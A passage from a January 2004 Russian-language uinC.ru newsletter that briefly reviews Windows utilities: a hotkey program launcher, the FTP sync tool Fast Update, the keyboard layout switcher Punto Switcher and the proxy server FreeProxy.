Программа представляет собой открывающуюся по горячей клавише консоль, позволяющую быстро запускать любые приложения, документы, URL, адреса почты и папки. Благодаря этой программе можно забыть о создании ярлыков и различных панелей для быстрого запуска программ. Данная программа ориентированна на пользователей, которых привлекает работа с "горячими клавишами" и тех, кто быстро печатает. Программа имеет возможность подключения плагинов для расширения функциональности.
ОС: Win 2k/XP
Тип программы: Системные утилиты

3/01/2004 Fast Update
Программа для автоматического обновления вашего интернет ресурса, смысл программы заключается в синхронизации папки на заданном FTP-сервере с содержимым папки на вашем локальном диске. Перед непосредственной загрузкой файлов на червер, программа проверяет наличие новых файлов и изменений в уже существующих файлах, а затем при необходимости, производит загрузку файлов с вашего компьютера на заданный веб-сервер. Существует встроенный планировщик, что позволяет производить синхронизацию в любое заданное время. Программа имеет русский интерфейс.
ОС: All Win
Тип программы: FTP

2/01/2004 Punto Switcher
Программа предназначена для автоматического переключения раскладки клавиатуры. Существует возможность автозамены и развертывания сокращений, например, вы пишите — 'СНП', и эти три буквы развернуться во фразу: 'С наилучшими пожеланиями', изменение стандартных сочетаний клавиш переключения раскладки, озвучивание событий с использованием PC Speaker, в программу встроен специальный алгоритм исправления ошибок в уже набранном тексте. И много других возможностей по работе раскладкой клавиатуры. Программа имеет русский интерфейс.
ОС: All Win
Тип программы: Текстовые утилиты

1/01/2004 FreeProxy
Прокси-сервер для MS Windows систем, который поддерживает следующие протоколы: HTTP, SMTP, POP, FTP через HTTP, TCP туннелирование, NNTP и SOCKS5. Существует возможность предоставления авторизации для пользователей, которая будет привязана или к созданной базе пользователей или списку пользователей домена, кроме этого в программу встроены фильтры контента, URL, IP адреса. Возможны ограничения работы пользователей по времени интервалам. Для пользователей формируется веб-сервер, который содержит информацию о статистике их работы.
ОС: All Win
Тип программы: Прокси-сервер

Архив рассылки новостей:
http://www.uinc.ru/news/archive/

Всем удачи.
uinC Team
http://www.uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://www.uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru